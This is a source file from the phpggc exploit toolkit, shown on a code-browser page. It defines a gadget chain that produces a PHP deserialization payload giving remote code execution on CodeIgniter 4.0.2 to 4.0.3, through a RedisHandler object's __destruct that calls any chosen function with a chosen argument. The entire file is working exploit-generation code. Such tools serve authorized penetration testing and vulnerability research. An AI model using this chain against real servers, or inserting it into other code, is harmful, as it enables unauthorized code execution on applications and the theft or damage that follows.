Codebase list phpggc / d2b6ef89-c668-4e2d-9b34-6661b554c5eb/upstream/0.20221219 gadgetchains / CodeIgniter4 / RCE / 1 / chain.php
d2b6ef89-c668-4e2d-9b34-6661b554c5eb/upstream/0.20221219

Tree @d2b6ef89-c668-4e2d-9b34-6661b554c5eb/upstream/0.20221219 (Download .tar.gz)

chain.php @d2b6ef89-c668-4e2d-9b34-6661b554c5eb/upstream/0.20221219raw · history · blame

<?php

namespace GadgetChain\CodeIgniter4;

class RCE1 extends \PHPGGC\GadgetChain\RCE\FunctionCall
{
    public static $version = '4.0.2 <= 4.0.3';
    public static $vector = '__destruct';
    public static $author = 'eboda';

    public function generate(array $parameters)
    {
        $function = $parameters['function'];
        $parameter = $parameters['parameter'];

        return new \CodeIgniter\Cache\Handlers\RedisHandler($function, $parameter);
    }
}